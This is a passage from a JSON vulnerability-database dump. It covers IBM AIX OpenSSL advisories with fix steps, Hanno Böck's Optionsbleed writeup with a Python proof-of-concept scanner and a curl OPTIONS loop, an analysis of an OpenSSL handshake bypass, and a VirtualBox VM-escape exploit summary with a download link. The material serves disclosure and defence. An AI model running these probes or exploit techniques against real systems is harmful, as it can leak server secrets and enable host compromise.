in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Support at\n https://ibm.com/support/ and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc.sig \n\n B. FIX AND INTERIM FIX INSTALLATION\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n \n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n https://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n https://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Contact IBM Support for questions related to this announcement:\n\n http://ibm.com/support/\n https://ibm.com/support/\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n https://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can :\n\n A. Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n https://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: \n http://www.first.org/cvss/user-guide\n https://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n https://www.first.org/cvss/calculator/3.0\n\n\nRELATED INFORMATION:\n\n Security Bulletin: Vulnerability in OpenSSL affects AIX (CVE-2017-3737)\n http://www-01.ibm.com/support/docview.wss?uid=isg3T1026943\n\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Mon Jan 29 10:36:55 CST 2018\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n\n\n", "edition": 4, "modified": "2018-01-29T10:36:55", "published": "2018-01-29T10:36:55", "id": "OPENSSL_ADVISORY25.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc", "title": "Vulnerability in OpenSSL affects AIX (CVE-2017-3737)", "type": "aix", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T19:19:13", "bulletinFamily": "unix", "cvelist": ["CVE-2018-0739"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Mon Apr 30 11:00:38 CDT 2018\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc\n\n\nSecurity Bulletin: Vulnerability in OpenSSL affects AIX (CVE-2018-0739) \n\n\n===============================================================================\n\nSUMMARY:\n\n There is a vulnerability in OpenSSL used by AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2018-0739 \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739\n DESCRIPTION: Constructed ASN.1 types with a recursive definition (such\n as can be found in PKCS7) could eventually exceed the stack given \n malicious input with excessive recursion. This could result in a \n Denial Of Service attack. \n CVSS Base Score: 5.3 \n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/140847 \n for the current score \n CVSS Environmental Score*: Undefined\n CVSS Vector:(CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n\n The following fileset levels are vulnerable:\n \n key_fileset = osrcaix\n\n Fileset Lower Level Upper Level KEY \n ------------------------------------------------------\n openssl.base 1.0.2.500 1.0.2.1300 key_w_fs\n openssl.base 20.13.102.1000 20.13.102.1300 key_w_fs\n\n Note: \n A. 0.9.8, 1.0.1 OpenSSL versions are out-of-support. Customers are \n advised to upgrade to currently supported OpenSSL 1.0.2 version.\n\n B. Latest level of OpenSSL fileset is available from the web download site:\n https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssl&cp=UTF-8\n \n To find out whether the affected filesets are installed on your systems, \n refer to the lslpp command found in the AIX user's guide.\n\n Example: lslpp -L | grep -i openssl.base\n\n REMEDIATION:\n\n FIXES\n\n The fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/openssl_fix26.tar\n http://aix.software.ibm.com/aix/efixes/security/openssl_fix26.tar\n https://aix.software.ibm.com/aix/efixes/security/openssl_fix26.tar \n\n The links above are to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n \n Note that the tar file contains Interim fixes that are based on \n OpenSSL version, and AIX OpenSSL fixes are cumulative.\n\n You must be on the 'prereq for installation' level before\n applying the interim fix. This may require installing a new\n level(prereq version) first.\n\n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n --------------------------------------------------------------------------------------------\n 5.3, 6.1, 7.1, 7.2 102ma_ifix.180410.epkg.Z openssl.base(1.0.2.1300) key_w_fix\n 5.3, 6.1, 7.1, 7.2 fips_102ma.180410.epkg.Z openssl.base(20.13.102.1300) key_w_fix\n\n VIOS Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n --------------------------------------------------------------------------------------------\n 2.2.* 102ma_ifix.180410.epkg.Z openssl.base(1.0.2.1300) key_w_fix\n 2.2.* fips_102ma.180410.epkg.Z openssl.base(20.13.102.1300) key_w_fix\n\n \n To extract the fixes from the tar file:\n\n tar xvf openssl_fix26.tar\n cd openssl_fix26\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the following:\n\n openssl dgst -sha256 filename KEY\n ------------------------------------------------------------------------------------------------------\n bfd40e466a6c7976fcf0cb46474087c550c043dc98b0be57689975388100bfdf 102ma_ifix.180410.epkg.Z key_w_csum\n ee752e4a70cd46295141d7441a99e019db0391f6539881c5d185433dd0cd42ae fips_102ma.180410.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Support at\n https://ibm.com/support/ and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc.sig \n\n B. FIX AND INTERIM FIX INSTALLATION\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n \n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n https://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n https://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Contact IBM Support for questions related to this announcement:\n\n http://ibm.com/support/\n https://ibm.com/support/\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n https://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: \n http://www.first.org/cvss/user-guide\n https://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n https://www.first.org/cvss/calculator/3.0\n\n\nRELATED INFORMATION:\n\n Security Bulletin: Vulnerability in OpenSSL affects AIX (CVE-2018-0739)\n http://www-01.ibm.com/support/docview.wss?uid=isg3T1027517 \n\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Mon Apr 30 11:00:38 CDT 2018\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n\n", "edition": 4, "modified": "2018-04-30T11:00:38", "published": "2018-04-30T11:00:38", "id": "OPENSSL_ADVISORY26.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc", "title": "Vulnerability in OpenSSL affects AIX (CVE-2018-0739)", "type": "aix", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:01:02", "description": "If you're using the HTTP protocol in everday Internet use you are usually only using two of its methods: GET and POST. However HTTP has a number of other methods, so I wondered what you can do with them and if there are any vulnerabilities.\r\n\r\nOne HTTP method is called OPTIONS. It simply allows asking a server which other HTTP methods it supports. The server answers with the \"Allow\" header and gives us a comma separated list of supported methods.\r\n\r\nA scan of the Alexa Top 1 Million revealed something strange: Plenty of servers sent out an \"Allow\" header with what looked like corrupted data. Some examples:\r\n```\r\nAllow: ,GET,,,POST,OPTIONS,HEAD,,\r\nAllow: POST,OPTIONS,,HEAD,:09:44 GMT\r\nAllow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"\r\nAllow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE\r\n```\r\n\r\n\r\n\r\nThat clearly looked interesting - and dangerous. It suspiciously looked like a \"bleed\"-style bug, which has become a name for bugs where arbitrary pieces of memory are leaked to a potential attacker. However these were random servers on the Internet, so at first I didn't know what software was causing this.\r\n\r\nSometimes HTTP servers send a \"Server\" header telling the software. However one needs to be aware that the \"Server\" header can lie. It's quite common to have one HTTP server proxying another. I got all kinds of different \"Server\" headers back, but I very much suspected that these were all from the same bug.\r\n\r\nI tried to contact the affected server operators, but only one of them answered, and he was extremely reluctant to tell me anything about his setup, so that wasn't very helpful either.\r\n\r\nHowever I got one clue: Some of the corrupted headers contained strings that were clearly configuration options from Apache. It seemed quite unlikely that those would show up in the memory of other server software. But I was unable to reproduce anything alike on my own Apache servers. I also tried reading the code that put together the Allow header to see if I can find any clues, but with no success. So without knowing any details I contacted the Apache security team.\r\n\r\nFortunately Apache developer Jacob Champion digged into it and figured out what was going on: Apache supports a configuration directive Limit that allows restricting access to certain HTTP methods to a specific user. And if one sets the [Limit](https://httpd.apache.org/docs/2.4/mod/core.html#limit) directive in an .htaccess file for an HTTP method that's not globally registered in the server then the corruption happens. After that I was able to reproduce it myself. Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header which was also [detectable with Address Sanitizer](https://blog.fuzzing-project.org/uploads/optionsbleed-asan.txt). (However ASAN doesn't work reliable due to the memory allocation abstraction done by APR.)\r\n\r\n### FAQ\r\n\r\n#### What's Optionsbleed?\r\n\r\nOptionsbleed is a use after free error in Apache HTTP that causes a corrupted Allow header to be constructed in response to HTTP OPTIONS requests. This can leak pieces of arbitrary memory from the server process that may contain secrets. The memory pieces change after multiple requests, so for a vulnerable host an arbitrary number of memory chunks can be leaked.\r\n\r\nThe bug appears if a webmaster tries to use the \"Limit\" directive with an invalid HTTP method.\r\n\r\nExample `.htaccess`:\r\n```\r\n<Limit abcxyz>\r\n</Limit>\r\n```\r\n\r\n#### How prevalent is it?\r\n\r\nScanning the Alexa Top 1 Million revealed 466 hosts with corrupted Allow headers. In theory it's possible that other server software has similar bugs. On the other hand this bug is nondeterministic, so not all vulnerable hosts may have been catched.\r\n\r\n#### So it only happens if you set a quite unusual configuration option?\r\n\r\nThere's an additional risk in shared hosting environments. The corruption is not limited to a single virtual host. One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system.\r\n\r\n#### I can't reproduce it!\r\n\r\nDue to its nature the bug doesn't appear deterministically. It only seems to appear on busy servers. Sometimes it only appears after multiple requests.\r\n\r\n#### Does it have a CVE?\r\n\r\n[CVE-2017-9798](https://nvd.nist.gov/vuln/detail/CVE-2017-9798).\r\n\r\n#### I'm seeing Allow headers containing HEAD multiple times!\r\n\r\nThis is actually a different Apache bug ([#61207](https://bz.apache.org/bugzilla/show_bug.cgi?id=61207)) that I found during this investigation. It causes HEAD to appear three times instead of once. However it's harmless and not a security bug.\r\n\r\nLaunchpad also has [a harmless bug that produces a malformed Allow header](https://bugs.launchpad.net/launchpad/+bug/1717682), using a space-separated list instead of a comma-separated one.\r\n\r\n#### How can I test it?\r\n\r\nA simple way is to use Curl in a loop and send OPTIONS requests:\r\n```\r\nfor i in {1..100}; do curl -sI -X OPTIONS https://www.google.com/|grep -i \"allow:\"; done\r\n```\r\nDepending on the server configuration it may not answer to OPTIONS requests on some URLs. Try different paths, HTTP versus HTTPS hosts, non-www versus www etc. may lead to different results.\r\n\r\nPlease note that this bug does not show up with the \"*\" OPTIONS target, you need a specific path.\r\n\r\nHere's a [python proof of concept script](https://github.com/hannob/optionsbleed).\r\n\r\n#### What shall I do?\r\n\r\nIf you run an Apache web server you should update. Most distributions should have updated packages by now or very soon. A patch can [be found here](https://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/server/core.c?r1=1805223&r2=1807754&pathrev=1807754&view=patch). A patch for Apache 2.2 is [available here](https://blog.fuzzing-project.org/uploads/apache-2.2-optionsbleed-backport.patch) (thanks to Thomas Deutschmann for backporting it).\r\n\r\nUnfortunately the communication with the Apache security team wasn't ideal. They were unable to provide a timeline for a coordinated release with a fix, so I decided to define a disclosure date on my own without an upstream fix.\r\n\r\nIf you run an Apache web server in a shared hosting environment that allows users to create .htaccess files you should drop everything you do right now, update immediately and make sure you restart the server afterwards.\r\n\r\n#### Is this as bad as Heartbleed?\r\n\r\nNo. Although similar in nature, this bug leaks only small chunks of memory and more importantly only affects a small number of hosts by default.\r\n\r\nIt's still a pretty bad bug, particularly for shared hosting environments.", "published": "2017-09-19T00:00:00", "type": "seebug", "title": "HTTP OPTIONS method can leak Apache's server memory(CVE-2017-9798)\n (Optionsbleed)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9798"], "modified": "2017-09-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96537", "id": "SSV:96537", "sourceData": "\n #!/usr/bin/env python3\r\n\r\n# Optionsbleed proof of concept test\r\n# by Hanno B\u00f6ck\r\n\r\nimport argparse\r\nimport urllib3\r\nimport re\r\n\r\n\r\ndef test_bleed(url, args):\r\n r = pool.request('OPTIONS', url)\r\n try:\r\n allow = str(r.headers[\"Allow\"])\r\n except KeyError:\r\n return False\r\n if allow in dup:\r\n return\r\n dup.append(allow)\r\n if allow == \"\":\r\n print(\"[empty] %s\" % (url))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$\", allow):\r\n z = [x.strip() for x in allow.split(',')]\r\n if len(z) > len(set(z)):\r\n print(\"[duplicates] %s: %s\" % (url, repr(allow)))\r\n elif args.all:\r\n print(\"[ok] %s: %s\" % (url, repr(allow)))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$\", allow):\r\n print(\"[spaces] %s: %s\" % (url, repr(allow)))\r\n else:\r\n print(\"[bleed] %s: %s\" % (url, repr(allow)))\r\n return True\r\n\r\n\r\nparser = argparse.ArgumentParser(\r\n description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',\r\n epilog=\"Tests server for Optionsbleed bug and other bugs in the allow header.\\n\\n\"\r\n \"Automatically checks http://, https://, http://www. and https://www. -\\n\"\r\n \"except if you pass -u/--url (which means by default we check 40 times.)\\n\\n\"\r\n \"Explanation of results:\\n\"\r\n \"[bleed] corrupted header found, vulnerable\\n\"\r\n \"[empty] empty allow header, does not make sense\\n\"\r\n \"[spaces] space-separated method list (should be comma-separated)\\n\"\r\n \"[duplicates] duplicates in list (may be apache bug 61207)\\n\"\r\n \"[ok] normal list found (only shown with -a/--all)\\n\",\r\n formatter_class=argparse.RawTextHelpFormatter)\r\nparser.add_argument('hosttocheck', action='store',\r\n help='The hostname you want to test against')\r\nparser.add_argument('-n', nargs=1, type=int, default=[10],\r\n help='number of tests (default 10)')\r\nparser.add_argument(\"-a\", \"--all\", action=\"store_true\",\r\n help=\"show headers from hosts without problems\")\r\nparser.add_argument(\"-u\", \"--url\", action='store_true',\r\n help=\"pass URL instead of hostname\")\r\nargs = parser.parse_args()\r\nhowoften = int(args.n[0])\r\n\r\ndup = []\r\n\r\n# Note: This disables warnings about the lack of certificate verification.\r\n# Usually this is a bad idea, but for this tool we want to find vulnerabilities\r\n# even if they are shipped with invalid certificates.\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\npool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')\r\n\r\nif args.url:\r\n test_bleed(args.hosttocheck, args)\r\nelse:\r\n for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:\r\n for i in range(howoften):\r\n try:\r\n if test_bleed(prefix+args.hosttocheck, args) is False:\r\n break\r\n except Exception as e:\r\n pass\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96537"}, {"lastseen": "2018-01-16T18:25:59", "description": "OpenSSL is a widely used library for SSL and TLS protocol implementation that secures data using encryption and decryption based on cryptographic functions. However, a Security Bypass vulnerability \u2013 recently addressed in a patch by the OpenSSL Project \u2013can be exploited to make vulnerable SSL clients or remote SSL servers send clean application data without encryption.\r\n\r\nThis Security Bypass vulnerability (CVE-2017-3737) is caused by an error when the SSL_read or SSL_write function handles an \"error state\" during an SSL handshake. In this paper the FortiGuard Labs team examines the root cause of this vulnerability.\r\n\r\nThe \"error state\" mechanism was introduced in OpenSSL beginning with version 1.0.2b, It is used to make OpenSSL move into an error state whenever a fatal error occurs during the SSL handshake that would fail if the SSL handshake continued. If SSL_read or SSL_write function is called directly, it checks the SSL handshake state and performs a new SSL handshake automatically if no handshake has been initiated. If a fatal error occurs during the SSL handshake, OpenSSL moves into the error state and returns an error message to the caller. However, the problem occurs if the caller doesn't check the error state and simply calls the SSL_read or SSL_write function again, because it then sends application data without encryption. \r\n\r\nThe following code snippet was taken from OpenSSL 1.0.2m. (Comments added by me have been highlighted.)\r\n\r\n`ssl/s3_pkt.c`:\r\n```\r\n638 int ssl3_write_bytes(SSL *s, int type, const void *buf_, int len)\r\n\r\n639 {\r\n\r\n640 const unsigned char *buf = buf_;\r\n\r\n641 int tot;\r\n\r\n642 unsigned int n, nw;\r\n\r\n643 #if !defined(OPENSSL_NO_MULTIBLOCK) && EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK\r\n\r\n644 unsigned int max_send_fragment;\r\n\r\n645 #endif\r\n\r\n646 SSL3_BUFFER *wb = &(s->s3->wbuf);\r\n\r\n647 int i;\r\n\r\n648 \r\n\r\n649 s->rwstate = SSL_NOTHING;\r\n\r\n650 OPENSSL_assert(s->s3->wnum <= INT_MAX);\r\n\r\n651 tot = s->s3->wnum;\r\n\r\n652 s->s3->wnum = 0;\r\n\r\n653 \r\n\r\n654 if (SSL_in_init(s) && !s->in_handshake) { //checks to see if the SSL handshake state is initiated. The state will be SSL_ST_INIT the first time.\r\n\r\n655 i = s->handshake_func(s); //performs a new SSL handshake if no handshake has been initiated.\r\n\r\n656 if (i < 0)\r\n\r\n657 return (i);\r\n\r\n658 if (i == 0) {\r\n\r\n659 SSLerr(SSL_F_SSL3_WRITE_BYTES, SSL_R_SSL_HANDSHAKE_FAILURE);\r\n\r\n660 return -1;\r\n\r\n661 }\r\n\r\n662 }\r\n```\r\n\r\nssl3_write_bytes() is called by the SSL_write function to send the application data. It checks the SSL handshake state and performs the SSL handshake if needed.\r\n\r\n`ssl/s3_clnt.c`:\r\n```\r\n898 int ssl3_get_server_hello(SSL *s)\r\n\r\n899 {\r\n\r\n900 STACK_OF(SSL_CIPHER) *sk;\r\n\r\n901 const SSL_CIPHER *c;\r\n\r\n902 CERT *ct = s->cert;\r\n\r\n903 unsigned char *p, *d;\r\n\r\n904 int i, al = SSL_AD_INTERNAL_ERROR, ok;\r\n\r\n....\r\n\r\n1077 if (i < 0) {\r\n\r\n1078 /* we did not say we would use this cipher */\r\n\r\n1079 al = SSL_AD_ILLEGAL_PARAMETER;\r\n\r\n1080 SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_WRONG_CIPHER_RETURNED);\r\n\r\n1081 goto f_err; //a fatal error occurs\r\n\r\n1082 }\r\n\r\n....\r\n\r\n1170 f_err:\r\n\r\n1171 ssl3_send_alert(s, SSL3_AL_FATAL, al); //sends an SSL alert packet\r\n\r\n1172 err:\r\n\r\n1173 s->state = SSL_ST_ERR; //moves into an error state\r\n\r\n1174 return (-1);\r\n\r\n1175 }\r\n```\r\n\r\nWe used a vulnerable SSL client as a target during the test. During the SSL handshake it received a malformed server hello message from the SSL server controlled by the attacker. ssl3_get_server_hello() is called to handle this server hello message and a fatal error occurs, causing OpenSSL to move into an error state by setting s->state from SSL_ST_INIT to SSL_ST_ERR.\r\n\r\n`ssl/s3_pkt.c`:\r\n```\r\n638 int ssl3_write_bytes(SSL *s, int type, const void *buf_, int len)\r\n\r\n639 {\r\n\r\n640 const unsigned char *buf = buf_;\r\n\r\n641 int tot;\r\n\r\n642 unsigned int n, nw;\r\n\r\n643 #if !defined(OPENSSL_NO_MULTIBLOCK) && EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK\r\n\r\n644 unsigned int max_send_fragment;\r\n\r\n645 #endif\r\n\r\n646 SSL3_BUFFER *wb = &(s->s3->wbuf);\r\n\r\n647 int i;\r\n\r\n648 \r\n\r\n649 s->rwstate = SSL_NOTHING;\r\n\r\n650 OPENSSL_assert(s->s3->wnum <= INT_MAX);\r\n\r\n651 tot = s->s3->wnum;\r\n\r\n652 s->s3->wnum = 0;\r\n\r\n653 \r\n\r\n654 if (SSL_in_init(s) && !s->in_handshake) { // SSL_in_init is called again to check the state\r\n```\r\n\r\nIf the vulnerable SSL client doesn't check the error state and call SSL_write function to send application data again, ssl3_write_bytes() is called and uses SSL_in_init() to check the handshake state again.\r\n\r\n`include/openssl/ssl.h`:\r\n```\r\n1749 # define SSL_in_init(a) (SSL_state(a)&SSL_ST_INIT) //s->state is now SSL_ST_ERR, and check returns are false.\r\n```\r\n\r\nThis time the check fails, the SSL handshake is bypassed and the application data will be sent without encryption.\r\n\r\n \r\n\r\nThe following traffic dump shows how the clean application data is sent:\r\n\r\n\r\n\r\n\r\nDuring this attack, the attacker entices the vulnerable SSL client to connect to a malicious SSL server. The SSL client may bypass the handshake process and send the application data without encryption. The SSL server may also have the same vulnerability if SSL_read or SSL_write function is called directly.\r\n\r\nNOTE: authentication is NOT required to exploit this vulnerability.\r\n\r\n \r\n\r\n##### IPS Signature\r\nFortiGuard released IPS signature OpenSSL.Handshake.Error.State.Security.Bypass to address this vulnerability.", "published": "2018-01-15T00:00:00", "title": "An Analysis of the OpenSSL SSL Handshake Error State Security Bypass (CVE-2017-3737)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3737"], "modified": "2018-01-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97082", "id": "SSV:97082", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}], "exploitpack": [{"lastseen": "2020-04-01T19:04:54", "description": "\nVirtualBox 5.2.6.r120293 - VM Escape", "edition": 1, "published": "2018-08-28T00:00:00", "title": "VirtualBox 5.2.6.r120293 - VM Escape", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2844"], "modified": "2018-08-28T00:00:00", "id": "EXPLOITPACK:D9276C7F60D6CECB06FC28389FF1B36D", "href": "", "sourceData": "Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration (VBVA) feature affecting Linux hosts. VBVA feature works on top of VirtualBox Host-Guest Shared Memory Interface (HGSMI), a shared memory implemented using Video RAM buffer. The VRAM buffer is at physical address 0xE0000000 \n\nI didn't see such optimization in VirtualBox for Windows and OSX. Only Linux hosts are affected. \n\nFind a value in VBoxDD.so (assume as some fake jump table), which during relative address calculation will point into the 16MB shared VRAM buffer. For the proof-of-concept exploit fill the entire VRAM with NOP's and place the shellcode at the final pages of the mapping. No ASLR bypass is needed since the jump is relative. \n\nIn the guest, add vboxvideo to /etc/modprobe.d/blacklist.conf. vboxvideo.ko driver has a custom allocator to manage VRAM memory and HGSMI guest side implementations. Blacklisting vboxvideo reduces activity on VRAM and keeps the payload intact. The exploit was tested with Ubuntu Server as Guest and Ubuntu Desktop as host running VirtualBox 5.2.6.r120293.\n\nThe proof-of-concept exploit code with process continuation and connect back over network can be found at virtualbox-cve-2018-2844\n\nhttps://www.voidsecurity.in/2018/08/from-compiler-optimization-to-code.html\nhttps://github.com/renorobert/virtualbox-cve-2018-2844\n\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45372.zip", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache 2.2.34 2.4.27 - OPTIONS Memory Leak", "edition": 1, "published": "2017-09-18T00:00:00", "title": "Apache 2.2.34 2.4.27 - OPTIONS Memory Leak", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9798"], "modified": "2017-09-18T00:00:00", "id": "EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D", "href": "", "sourceData": "#!/usr/bin/env python3\n\n# Optionsbleed proof of concept test\n# by Hanno B\u00f6ck\n\nimport argparse\nimport urllib3\nimport re\n\n\ndef test_bleed(url, args):\n r = pool.request('OPTIONS', url)\n 